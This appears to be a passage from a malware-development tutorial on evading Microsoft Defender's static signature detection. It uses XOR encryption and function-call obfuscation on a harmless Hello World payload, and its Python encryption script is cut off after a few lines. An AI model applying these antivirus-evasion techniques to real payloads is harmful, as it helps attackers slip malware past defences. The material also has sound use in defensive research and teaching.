Evasion static detection
Signature detection is simple to circumvent but time-consuming. It is essential to avoid hardcoding values that can be used to uniquely identify the implementation into malware. As mentioned earlier, the code that will be presented throughout this chapter dynamically retrieves or calculates the values.
Practical example
Let’s learn how to circumvent Microsoft Defender’s static analysis engine using XOR encryption and function call obfuscation tricks. At this stage, the payload is simply a pop-up Hello World message box. Therefore, we will place particular emphasis on static/signature evasion.
To encrypt the hello.bin payload and obfuscate functions, we can use the following Python script:
import sys import os import hashlib import string ## XOR function to encrypt data def xor(data, key): key = str(key) l = len(key) output_str = "" ...
